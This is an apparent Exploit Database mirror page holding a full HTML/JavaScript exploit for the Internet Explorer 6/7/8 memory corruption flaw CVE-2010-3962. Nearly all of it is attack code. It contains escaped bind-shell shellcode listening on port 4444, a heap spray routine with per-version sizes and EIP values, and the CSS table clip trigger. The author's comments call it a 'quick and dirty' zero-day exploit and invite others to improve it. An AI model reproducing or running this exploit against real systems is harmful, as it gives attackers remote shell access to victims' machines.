Microsoft Internet Explorer 6/7/8 – Memory Corruption

• Exploit Database
• 14 阅读

• 作者： ryujin
  日期： 2010-11-04
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15421/

• # Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
  # Tested on Windows XP SP3 IE6 IE7 IE8
  # Coded by Matteo Memelli ryujin __at__ offsec.com
  # http://www.offensive-security.com/0day/ie-0day.txt
  # Thx to dookie __at__ offsec.com
  # notes	: This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it 
  
  <!-- Tested on IE6/IE7/IE8 XPSP3 quick and dirty sploit for CVE-2010-3962 zeroday
  
  Note: The EIP value at crash time is not controllable and depends on the exact version of the mshtml library used by IE; this means that the exploit is not universal for the IE versions indicated hereunder. 
  A huge spray will probably be more successful on different versions of mshtml but will definetly slow down the exploitation. 
  
  IE6 on XP SP2: mshtml.dll Version 6.0.2900.5512 EIP: 0x0D7DC9C9
  IE6 on XP SP3: mshtml.dll Version 6.00.2900.6036 Patched 06Nov10 EIP: 0x0E7DC9CD
  IE7 on XP SP3: mshtml.dll Version 7.00.6000.17080 EIP: 0x303CEEBB
  IE8 on XP SP3: mshtml.dll Version 8.00.6001.18939 EIP: 0x1D3CF5BD
  IE8 on XP SP3 Patched 06Nov10: mshtml.dll Version 8.00.6001.18975 EIP: 0x4D3CF5BF
  
  Matteo Memelli, ryujin __at__ offsec.com thx to dookie __at__ offsec.com //-->
  
  <html>
  <head><title>poc CVE-2010-3962 zeroday</title>
  <script>
  function alloc(bytes, mystr) {
  // Bindshell on port 4444
  var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+
  '%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b'+
  '%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34'+
  '%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301'+
  '%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a'+
  '%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4'+
  '%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268'+
  '%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468'+
  '%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912'+
  '%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856'+
  '%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd'+
  '%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5');
  while (mystr.length< bytes) mystr += mystr;
  return mystr.substr(0, (bytes-6)/2) + shellcode;
  }
  </script>
  </head>
  <body>
  <script>
  alert('ph33r: click me');
  var evil = new Array();
  var FAKEOBJ = unescape("%u0d0d%u0d0d");
  //FAKEOBJ = alloc(233120, FAKEOBJ); // IE6 mshtml.dll Version 6.0.2900.5512
  //FAKEOBJ = alloc(241748, FAKEOBJ); // IE6 mshtml.dll Version 6.00.2900.6036 
  //FAKEOBJ = alloc(733120, FAKEOBJ); // IE7 mshtml.dll Version 7.00.6000.17080
  //FAKEOBJ = alloc(433120, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18939
  FAKEOBJ = alloc(1294464, FAKEOBJ); // IE8 mshtml.dll Version 8.00.6001.18975
  //FAKEOBJ = alloc(1550371, FAKEOBJ); // oy oy oy huge spray! 
  
  for (var k = 0; k < 1000; k++) {
  evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
  }
  document.write("<table style=position:absolute;clip:rect(0)>");
  </script>
   
  </body>
  </html>